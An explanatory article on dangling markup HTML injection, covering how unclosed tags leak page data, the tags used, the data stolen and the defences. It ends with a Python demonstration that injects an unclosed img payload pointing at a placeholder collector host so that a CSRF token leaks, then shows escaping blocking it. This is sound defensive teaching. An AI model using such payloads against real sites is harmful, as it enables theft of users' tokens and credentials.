Dangling markup

Dangling markup is a type of HTML injection attack, which exploits an unclosed tag or attribute. The aim of such an attack is to gain access to confidential data that is either contained in the code of the target web page or entered into forms on it.

Similar to cross-site scripting, this attack is used when the security policies of a site or web application prohibit script injection, but not the introduction of HTML tags.

Dangling markup attack technique

In HTML, tags and tag attributes are opened and closed with specific character sequences. If a tag or attribute carries everything the browser needs to act on it but is never closed, the browser does not throw an error: it treats all of the following text as part of that tag or attribute until it reaches a closing delimiter, ignoring any further occurrences of the opening delimiter along the way. For example, if the page code contains two opening <form> tags with different destination addresses, data entered in the form is sent to the first address. This behaviour opens the door to attacks on sites and web applications vulnerable to tag injection.

Basically, the attack goes as follows: the attacker injects a tag or attribute into the target page and leaves it open, allowing a request (e.g., for an image) or data (e.g., form content) to be sent to a third-party site. In the case of an image, when the compromised page is loaded, the browser sends a request to the resource specified by the attacker, including all code located between the injected tag and the closing delimiter, which, before the page was compromised, closed a different tag or attribute. In the case of a form, the page sends the data to the attacker’s site as soon as the user enters it.

Tags used in dangling markup attacks

In dangling markup attacks, cybercriminals can use tags that imply or allow access to a third-party resource, such as:

  • <img>, <video> and other tags with an src attribute
  • <form>
  • <script>

Data stolen using dangling markup

Depending on the functionality of the vulnerable web application, dangling markup allows attackers to get hold of the following user data:

  • Message text (e-mail, instant messengers, social networks), login credentials, bank card details — whatever the user enters on the compromised page.
  • CSRF session tokens generated to protect against cross-site request forgery.
  • Nonce values used by security policies to determine allow-listed elements, for example a script from a particular source that is allowed to run on a page that otherwise blocks third-party scripts. A nonce attack can lead to execution of a malicious script on the target page.
  • Data pulled from the user’s device using the iframedoc attribute.

Protection against dangling markup

One can reduce the chances of getting hit by a dangling markup attack by:

  • Checking web applications for vulnerability to code injection, including HTML tags.
  • Checking and sanitizing user input data; that is, removing unsafe and erroneous characters.
  • Introducing content security policies (CSP).
  • Using browsers with protection against dangling markup.
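As an added example (not code from the original article), the following Python simulates the tokenizer rule described in the attack technique section and the "sanitizing user input" protection above: an unclosed `src='` swallows the rest of the page up to the next single quote, so a hidden CSRF token ends up in the image request, while the same text rendered through `html.escape` can open no tag at all. The template, token, and `collector.invalid` host are constructed for the demonstration.

```python
import html
import re

# Constructed sample: a template that echoes a user-supplied search string, then a
# CSRF-protected form, then a single-quoted attribute (the next "'" in the page).
PAGE_TEMPLATE = (
    "<p>Results for: {query}</p>\n"
    '<form action="/transfer" method="post">\n'
    '<input type="hidden" name="csrf" value="{token}">\n'
    '<input type="submit" value="Send">\n'
    "</form>\n"
    "<a href='/logout'>Log out</a>"
)

# Injected text: an <img> whose src attribute is opened but never closed.
# The host is a placeholder (.invalid is reserved), not a real endpoint.
DANGLING_IMG = "<img src='https://collector.invalid/?"

def render_unescaped(query: str, token: str) -> str:
    """Vulnerable rendering: user text is concatenated into the HTML verbatim."""
    return PAGE_TEMPLATE.format(query=query, token=token)

def render_escaped(query: str, token: str) -> str:
    """Fixed rendering: html.escape turns < > & " ' into entities, so user text
    can neither open a tag nor close someone else's attribute."""
    return PAGE_TEMPLATE.format(query=html.escape(query, quote=True), token=token)

def img_src_requested(document: str):
    """Simulate the tokenizer rule the article describes: after src=' the browser
    takes everything up to the next matching quote as the URL it will request,
    across newlines and other tags. An attribute that is never closed emits no
    tag at all, so None is returned in that case."""
    m = re.search(r"<img\s+src=(['\"])", document, re.IGNORECASE)
    if not m:
        return None
    close = document.find(m.group(1), m.end())
    return document[m.end():close] if close != -1 else None

def csrf_token_leaked(document: str, token: str) -> bool:
    """True if the simulated image request would carry the hidden CSRF token."""
    url = img_src_requested(document)
    return url is not None and token in url

if __name__ == "__main__":
    tok = "c5rf-t0k3n-sample"
    print(csrf_token_leaked(render_unescaped(DANGLING_IMG, tok), tok))  # True
    print(csrf_token_leaked(render_escaped(DANGLING_IMG, tok), tok))  # False
```

A real browser additionally strips newlines from and percent-encodes the captured text before sending the request, but the token travels with it all the same.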
